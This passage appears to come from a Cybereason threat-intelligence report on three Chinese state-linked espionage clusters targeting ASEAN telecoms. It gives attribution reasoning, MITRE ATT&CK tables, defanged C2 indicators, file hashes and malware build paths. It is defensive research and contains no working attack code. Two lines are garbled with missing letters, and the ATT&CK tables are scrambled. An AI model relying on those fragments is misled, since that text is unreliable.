Further Connections to Chinese Threat Actors ----- u g ou a a ys s o t e d e e t c uste s, e ot ced te est g co ect o s a d s a t es to o C ese t eat acto s t e te est of providing perhaps a broader context, we decided to share our observations in the hope that it will enable other researchers to draw their own conclusions as to the degree of relevance of our findings. ### Connections to Winnti’s Tools and Infrastructure Connections Between Naikon APT Nebulae Backdoor and Winnti’s ShadowPad Infrastructure When examining a Nebulae backdoor sample (likely not related to the attack), we noticed that one of the domains that were contacted by [backdoor is ttareyice.jkub[.]com. This domain was previously mentioned in a detailed report which talks about the activity of the Winnti group,](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf) and also about its relations to other threat groups. It is also worth mentioning that Winnti is known to attack telecommunications companies. According to the report, we can see an additional evidence of Winnti sharing its infrastructure, this time between a ShadowPad sample attributed to them and the Nebulae backdoor, reportedly attributed to Naikon: _Nebulae and ShadowPad mutual infrastructure_ ### Use of PcShare Backdoor in Previous Winnti-Related Attacks Another possible connection to Winnti’s Shadowpad backdoor is via the usage of a customized PcShare Backdoor that was found on multiple endpoints in Cluster A described in this report. In October 2020, Dr. Web [released a report detailing targeted attacks in Kazakhstan and](https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf) Kyrgyzstan involving Winnti’s Shadowpad backdoor. That same report also mentions a backdoor dubbed “BackDoor.Farfli.125'' that was deployed alongside the Shadowpad payloads. Our analysis of the “BackDoor.Farfli.125'' backdoor concluded that it is a variant of the opensource PcShare backdoor. From a tradecraft perspective, it is interesting to note that the attackers in the aforementioned Dr. Web report also chose to use a loader that masquerades as a legitimate NVIDIA product, as shown in Cluster A of our report. ### Possible Connection Between APT41 and Soft Cell [While pivoting from indicative PDB paths of the tools used by Soft Cell (listed in Appendix A, some were also observed by Markus Neis), we](https://github.com/yt0ng/cracking_softcell/blob/main/Cracking_SOFTCLL_TLP_WHITE.pdf) [came across additional binaries that share code similarities with another malware named ChipShot, attributed to](https://www.slideshare.net/MitchellClarke14/cyber-threat-2019-ncscsans-london-conference-mandiant-grab-bag-of-attacker-activity) [APT41 (tracked by some](https://attack.mitre.org/groups/G0096/) vendors as Winnti). ChipShot is a .NET binary that drops a modified China Chopper WebShell, which is found in the resource section of the file. Examples of the pivoted PDB paths: E:\vs_proj\DeployFilter_NET2.0\DeployFilter\obj\Release\DeployFilter.pdb - ChipShot Dropper E:\vs_proj\serviceFilter_NET2.0\serviceFilter\obj\Release\serviceFilter.pdb - Modified ChinaChopper webshell It is noteworthy to mention that APT41 [was also reported targeting telecommunications organizations in the past, and was suggested to be](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html) [linked to the previous Soft Cell campaign from 2019. Also, the group was reported abusing a NVIDIA product (nvSmartEx.exe) for DLL side-](https://www.fireeye.com/content/dam/collateral/en/rpt-apt41-2019.pdf) loading, the same product that was abused in cluster A: _Code snippet from ChipShot Dropper: edits the IIS applicationHost.config file_ ----- _Code snippet from Modified ChinaChopper WebShell_ ### Possible Connection Between Tropic Trooper and Soft Cell [As previously mentioned in our report, one of the PcShare payloads analyzed had the same hash that was mentioned in a report by](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware) BlackBerry from 2019. In both instances, the attackers used the exact same DLL search order hijacking technique with a fake NVIDIA product. Aside from the forensic evidence, the geographical locations of the attacks and the timeline also point to a strong tie between the BlackBerry [report and this report. BlackBerry hypothesized the threat actor behind the attack was Tropic Trooper, however, as mentioned in their report,](https://attack.mitre.org/groups/G0081/) they could not establish that attribution with high-certainty. At this point, we can conclude that both intrusions were carried out by the same threat actor that had access to the same code and used an identical tradecraft. Whether Tropic Trooper and Soft Cell are the same actor remains unclear at the moment, since we could not verify the BlackBerry attribution. ### Possible Connection Between Cluster B and an Older Phishing Attempt The custom keylogger mentioned in Cluster B of this report was executed by a fake svchost.exe process located in a rather unusual folder: c:\program files (x86)\internet explorer\svchost.exe (SHA-1: 91b0d7fa50d993c7a35ec501ef5f3585f0003a51). Aside from the unusual location, the file also contained a few typos in its metadata fields (“Coporation”, “Widows”): _Typos found in metadata fields of the fake svchost.exe_ [Pivoting on these specific typos, file name and version, we were able to find a sample in VirusTotal uploaded from Vietnam in October 2016](https://www.virustotal.com/gui/file/936f0288d3753b654b04b4f751999dfeb52235b2a0ff39ce312ef72b679787aa/detection) that is called “svchost.exe” and contains the same typos and file version. It’s interesting to notice that the sample name in-the-wild is called “1 _Military Alliance Utilizing ASEAN Plus 3 as Platform An Appraisal for Prospects.exe”:_ Upon executing the sample, it will unpack the following into %TEMP% folder: ----- **decoy** **e** **An unknown backdoor masquerading as a legitimate Windows binary wmiprvse.exe (SHA-1:** 5572fa29e61009a626320275b36eef0d5142e3e2) _Decoy PDF file_ [The decoy PDF file contains questions and answers regarding a known geo-political territorial dispute in the South China Sea, and particularly](https://en.wikipedia.org/wiki/Territorial_disputes_in_the_South_China_Sea) discusses the Chinese territorial dispute with the Philippines. While this could be merely a coincidence, the probability of having two samples with the exact same typos, file name and version and both related to China, does seem a bit peculiar, especially since the Naikon APT group that we believe is behind Cluster B is known to have [attacked the countries of the South China Sea, including Vietnam and the Philippines, and therefore we thought it might be worth mentioning.](https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/) ### Attribution Attributing Clusters A, B and C After analyzing all of the data we accumulated through our platform, incident response efforts, malware analysis, and threat intelligence, we were able to define three distinct clusters of malicious activity. Each cluster is characterized with its own set of TTPs and infrastructure which appear to have operated independently, according to our analysis: **Cluster A: Attributed to the Soft Cell Activity Group** Based on the evidence provided in this report as well as internal and publicly available information, Cybereason assesses with high level of confidence that the intrusions detailed in this cluster are consistent with previous activities carried out by the Soft Cell activity group. Soft Cell has yet been attributed to a specific threat actor, however, it is assessed that the group operates on behalf of Chinese state interests. As shown in our report, there are some interesting links between the Soft Cell activity group and the APT41/Winnti threat actor, nevertheless, at the time of writing this report, there is not enough evidence to tie the two with sufficient certainty. **Cluster B: Suspected to be the Naikon APT Group** Based on the information provided in this report as well as information that is publicly available regarding the Naikon APT threat actor activity, Cybereason assesses with moderate confidence that the intrusions detailed in this cluster were carried out by the Naikon APT group. **Cluster C: Potentially Related to Group-3390 (also tracked as Emissary Panda, APT27)** Based on the information provided in this report, Cybereason assesses with low-to-moderate confidence that the intrusions detailed in this cluster were carried out by a threat actor who had access to the code of the “Dllshellexc2007” and “Dllshellexc2010” backdoors detailed in operation “Iron Tiger” and attributed by TrendMicro to Group-3390. ----- at be g sa d, e ca ot g o e ce ta te est g o e aps e t co es to t e a o e e t o ed c uste s o e pa t cu a sta ce, Cybereason observed all three clusters on the same environment, and in some cases even operating on the same endpoints around similar time frames. Whether this is merely a coincidence, or the clusters are somehow inter-connected, is not entirely clear at this point in time. Among the three clusters, we lean towards the possibility that Cluster A and C might be connected based on the fact that they have been operating in the same environment for over three years (since 2017/2018), while Cluster B only emerged in 2020 Q4. In addition, the OWA [backdoor described in Cluster C was previously proven to interact with the China Chopper WebShell that was used extensively in Cluster A.](http://www.erai.com/CustomUploads/ca/wp/2015_12_wp_operation_iron_tiger.pdf) Based on our understanding and past experience with Chinese threat actors, there are several hypotheses that might explain those overlaps: **One hypothesis is that the clusters represent the work of two or more teams with different sets of expertise (e.g initial access team,** foothold, telco-technology specialized team, etc.) all working together and reporting to the same Chinese threat actor. **A second hypothesis is that there are two or more Chinese threat actors with different agendas / tasks that are aware of each other’s** work and potentially even working in tandem. **Another plausible hypothesis is that the clusters are not interconnected and that the threat actors are working independently with no** collaboration, or even piggybacking on the access achieved by one of the actors involved. One thing that remains consistent and evident in all three clusters is that they all point to threat actors that are believed to be operating on [behalf of Chinese state interests. It is also not surprising that the Telcos targeted in these intrusions are located in ASEAN countries, some of](https://en.wikipedia.org/wiki/ASEAN) which have long term publicly known disputes with the PRC (People’s Republic of China). ### A Note on CTI Attribution In the world of threat intelligence, attribution is often not an exact science and should be continuously re-assessed overtime as new information emerges that can shed more light on the identity of the threat actors. Therefore, we encourage our readers to use the information provided in [this report and draw their own conclusions. In our attribution, inspired by the famous Diamond Model, we have taken into account the following](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) aspects of the intrusions: Victimology (location, industry), Capabilities (mainly tools, techniques and procedures) and Infrastructure. When analyzing intrusions that happened over years, it is often difficult to separate one kill-chain from another even when there is just a single threat actor. With the possibility of more than one threat actor operating in the same environment, this task can be even more daunting, and oftentimes it can be tempting to treat everything as part of one larger attack originating from the same threat actor, which could lead to misattribution. We encourage other analysts to work with a well-defined attribution model that can make the fickle task of attribution less prone to mistakes and biases. ### Conclusion In this blog we uncovered three clusters of intrusions targeting Telcos in ASEAN countries that were active for several years, with one cluster going back as far as 2017. We assess that the goal behind the intrusions was to facilitate cyber espionage efforts by gaining access to cellular providers for the purpose of exfiltrating sensitive data about the targeted companies and their customers. Each cluster appears to have its own unique characteristics, distinguishing it from the other clusters detailed in this report. In our report, we also mention the interesting overlaps observed among those clusters - namely the targeting of the same victims, operating around similar time frames, and in some cases the existence of all three clusters on the same endpoints. According to our analysis, Cluster A was executed by the Soft Cell activity group, a group that is known to have attacked Telcos in the past in multiple regions and believed to be operating on behalf of Chinese state interests. The intrusions in this cluster span over three years, going back to 2018. The attackers behind it have shown great resourcefulness and adaptiveness in light of mitigation efforts, finding their way back in repeatedly, which may demonstrate how important it was for them to obtain the data from the targeted Telcos. Cluster B was discovered in late 2020 and exhibited a different set of tools and techniques, including the rare Nebulae backdoor and the previously undocumented EnrollLogger keylogger. We suspect that the activity in this cluster was carried out by the Naikon APT group, a very active cyber espionage group previously attributed to the Chinese People’s Liberation Army’s (PLA). Cluster C is the oldest among the clusters, with first signs of intrusions going back to 2017. This cluster exhibited a rare OWA backdoor that shows considerable code and functionality similarities to previously documented backdoors that were used by the Group-3390 (APT27), an infamous cyber espionage APT group operating on behalf of Chinese state interests. Whether these clusters are in fact inter-connected or operated independently from each other is not entirely clear at the time of writing this report. We offered several hypotheses that can account for these overlaps, hoping that as time goes by more information will be made available to us and to other researchers that will help to shed light on this conundrum. ## Researchers ----- LIOR ROCHBERGER, SENIOR THREAT RESEARCHER As part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including Bitbucket, Valak, Ramnit, and Racoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force. TOM FAKTERMAN, THREAT RESEARCHER Tom Fakterman, Cyber Security Analyst with the Cybereason Nocturnus Research Team, specializes in protecting critical networks and incident response. Tom has experience in researching malware, computer forensics and developing scripts and tools for automated cyber investigations. DANIEL FRANK, SENIOR MALWARE RESEARCHER With a decade in malware research, Daniel uses his expertise with malware analysis and reverse engineering to understand APT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft Digital Crimes Consortium, and Rootcon. ASSAF DAHAN, HEAD OF THREAT RESEARCH Assaf has over 15 years in the InfoSec industry. He started his career in the Israeli Military 8200 Cybersecurity unit where he developed extensive experience in offensive security. Later in his career he led Red Teams, developed penetration testing methodologies, and specialized in malware analysis and reverse engineering. ## Indicators of Compromise _Open the chatbot on the bottom right corner of this report to access the DeadRinger IOCs and Appendix A._ ### MITRE ATT&CK BREAKDOWN (Cluster A - Soft Cell Activity) **Reconnaissance** **Initial** **Access** **Execution** **Persistence** **Privilege** **Escalation** **Defense** **Evasion** **Lateral** **Movement** **Credential** **Access** **Discovery** **Exfilt** ----- Gather Victim Host Information Exploit PublicFacing Application Command-line interface [WebShell](https://attack.mitre.org/techniques/T1100/) Valid Accounts Hijack [Execution](https://attack.mitre.org/techniques/T1574/) Flow Credential Dumping Credentials from Password Stores System Network Configuration Discovery Remote [System](https://attack.mitre.org/techniques/T1018/) Discovery Account Discovery Data Com Exfilt Over [Com](https://attack.mitre.org/techniques/T1041/) and C Chan [Active Scanning](https://attack.mitre.org/techniques/T1595/) Windows [Management](https://attack.mitre.org/techniques/T1047/) Instrumentation Create Account Windows [Admin](https://attack.mitre.org/techniques/T1077/) Shares Pass the Hash Remote File Copy Gather Victim [Network](https://attack.mitre.org/techniques/T1590/) Information [PowerShell](https://attack.mitre.org/techniques/T1086/) Scheduled Task [WebShell](https://attack.mitre.org/techniques/T1100/) Indicator [Removal from](https://attack.mitre.org/techniques/T1066/) Tools Obfuscated [Files or](https://attack.mitre.org/techniques/T1027/) Information [Masquerading](https://attack.mitre.org/techniques/T1036/) Permission [Groups](https://attack.mitre.org/techniques/T1069/) Discovery Indicator Removal on Host: Timestomp ### MITRE ATT&CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity) **Reconnaissance** **Execution** **Persistence** **Privilege** **Escalation** **Defense** **Evasion** DLL-side Loading Indicator [Removal from](https://attack.mitre.org/techniques/T1066/) Tools **Lateral** **Movement** SMB/Windows Admin Shares Lateral Tool Transfer **Credential** **Access** Credential Dumping **Discovery** **Command** **and** **Control** Gather Victim Host Information Command-line interface Windows Service Valid Accounts [Keylogging](https://attack.mitre.org/techniques/T1056/001/) System Network Configuration Discovery Encrypted Channel [Active Scanning](https://attack.mitre.org/techniques/T1595/) Windows [Management](https://attack.mitre.org/techniques/T1047/) Instrumentation Remote [System](https://attack.mitre.org/techniques/T1018/) Discovery Gather Victim [Network](https://attack.mitre.org/techniques/T1590/) Information System Services [Masquerading](https://attack.mitre.org/techniques/T1036/) Account Discovery Permission [Groups](https://attack.mitre.org/techniques/T1069/) Discovery ### MITRE ATT&CK BREAKDOWN (Cluster C - Custom OWA Backdoor) **Execution** **Persistence** **Defense Evasion** **Credential** **Discovery** **Command and** **Access** **Control** **Exfiltration** Command-line interface [Web Shell](https://attack.mitre.org/techniques/T1505/003/) [Masquerading](https://attack.mitre.org/techniques/T1036/) Network Sniffing Deobfuscate/Decode Files or Information Account Discovery Remote System Discovery [Web Protocols](https://attack.mitre.org/techniques/T1071/001/) Exfiltration Over C2 Channel ### Indicators of Compromise | DeadRinger **Note: Not all IOCs observed in the attacks could be shared in our public report.** ----- **Cluster A - Soft Cell Activity** **Indicator** **Type** **Associated Tool** 47.56.86[.]44 IP Address PcShare Backdoor 45.76.213[.]2 IP Address PcShare Backdoor 45.123.118[.]232 IP Address PcShare Backdoor 19e961e2642e87deb2db6ca8fc2342f4b688a45c SHA-1 Hash PcShare Backdoor ba8f2843e2fb5274394b3c81abc3c2202d9ba592 SHA-1 Hash PcShare Backdoor 101.132.251[.]212 IP Address Cobalt strike (iediag.dll) Cymkpuadkduz[.]xyz Domain Cobalt strike (iediag.dll) 243cd77cfa03f58f6e6568e011e1d6d85969a3a2 SHA-1 Hash Cobalt strike (iediag.dll) c549a16aaa9901c652b7bc576e980ec2a008a2e0 SHA-1 Hash Mscorsvc.dll - Mimikatz c2850993bffc8330cff3cb89e9c7652b8819f57f SHA-1 Hash Mimikatz (PowerShell empire) 440e04d0cc5e842c94793baf31e0d188511f0ace SHA-1 Hash D64.exe - Mimikatz e2340b27a4b759e0e2842bfe5aa48dda7450af4c SHA-1 Hash Mimikatz 15336340db8b73bf73a17c227eb0c59b5a4dece2 SHA-1 Hash China Chopper WebShell (owaauth.aspx) 5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 SHA-1 Hash China Chopper WebShell (error4.aspx) **Cluster B - Suspected Naikon APT** nw.eiyfmrn[.]com Domain Nebulae backdoor C2 jdk.gsvvfsso[.]com Domain Nebulae backdoor C2 0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 SHA-1 Hash Nebulae backdoor (chrome_frame_helper.dll) 81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 SHA-1 Hash PotPlayer.dll.txt (EnrollLogger keylogger) e93ceb7938120a87c6c69434a6815f0da42ab7f2 SHA-1 Hash Chrome.exe - Mimikatz **Cluster C - Potentially Linked to Group-3390** 207b7cf5db59d70d4789cb91194c732bcd1cfb4b SHA-1 Hash Microsoft.Exchange.Clients.Event.dll 71999e468252b7458e06f76b5c746a4f4b3aaa58 SHA-1 Hash Microsoft.Exchange.Clients.Event.dll ### Additional Nebulae Backdoor IOCs Potentially linked to Other Attacks **Indicator** **Type** **Associated Tool** ----- 39c5c45dbec92fa99ad37c4bab09164325dbeea0 efc6c117ecc6253ed7400c53b2e148d5e4068636 a3c5c0e93f6925846fab5f3c69094d8a465828e9 a4232973418ee44713e59e0eae2381a42db5f54c 5602bf8710b1521f6284685d835d5d1df0679b0f e3fcda85f5f42a2bffb65f3b8deeb523f8db2302 720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 b699861850e4e6fde73dfbdb761645e2270f9c9a 6516d73f8d4dba83ca8c0330d3f180c0830af6a0 99f8263808c7e737667a73a606cbb8bf0d6f0980 a5b193118960184fe3aa3b1ea7d8fd1c00423ed6 92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db d9e828fb891f033656a0797f5fc6d276fbc9748f 87c3dc2ae65dcd818c12c1a4e4368f05719dc036 ttareyice.jkub[.]com my.eiyfmrn[.]com A.jrmfeeder[.]org afhkl.dseqoorg[.]com ### Appendix A: Related Samples to Soft Cell SHA-1 Hash Nebulae backdoor (Additional Nebulae payloads, potentially related to other attacks) Domain Nebulae backdoor C2 (potentially related to other attacks) Additional samples that could be part of the arsenal use by Soft Cell: **PDB Path** **SHA-1 Hash** **Comment** E:\vs_proj\serviceFilter_NET2.0\serviceFilter\obj\Release\serviceFilter.pdb d028ecba36e834766b57669778d3d16b309534f4 Modified ChinaChopper E:\vs_proj\DeployFilter_NET2.0\DeployFilter\obj\Release\DeployFilter.pdb 538c710dc6228e2eddec8925944adc417112a697 ChipShot E:\vs_proj\serviceFilter_NET4.5\serviceFilter\obj\Release\serviceFilter.pdb e5efe342950e58fafe77226f2f5f04568c0fac5d Modified ChinaChopper E:\vs_proj\DeployFilter_NET4.5\DeployFilter\obj\Release\DeployFilter.pdb 79ad43e3ec3440d107e7d6a5c3d3d42b1097d088 ChipShot E:\simplify_modify\x64\simplify.pdb 79ef78a797403a4ed1a616c68e07fff868a8650a 9c5e496921e3bc882dc40694f1dcc3746a75db19 4f808abc12ab52450062e0ab26a480a228115d96 f0d38de7e9994a4dffdb7f10d18e326235e3d667 68e7fc1ea8799c14a993b74c249fef77d0ef8f28 Mimikatz Signed by “Whizzimo, LLC” E:\simplify_modify\Win32\simplify.pdb aeb573accfd95758550cf30bf04f389a92922844 Mimikatz E:\vs_proj\gh0st3.6_src_Unicode\gh0st\Release\gh0st.pdb e994c00ebd3e7016c9343a18742470f4a03ad5ae Gh0st RAT ----- E:\vs_proj\remoteServer\Release\remoteServer.pdb b681897f805fc337201e208264f36e6d66b9e363 Gh0st RAT E:\vs_proj\remoteManager\Release\remoteServer.pdb 47b1d607db587d932e5986804a68dbda5b385905 Gh0st RAT E:\vs_proj\remoteManager_new\server\Release\remoteServer.pdb 2a2849cb6d4f503a9ee95827a7e05f5d78333dc5 Gh0st RAT E:\vs_proj\simplify_modify\Win32\simplify.pdb 7cb7bcb9187f8faf47fd77cf1213ab3fe2350a77 Mimikatz E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb 440e04d0cc5e842c94793baf31e0d188511f0ace Mimikatz About the Author **Cybereason Nocturnus** The Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks. [All Posts by Cybereason Nocturnus](https://www.cybereason.com/blog/authors/cybereason-nocturnus) -----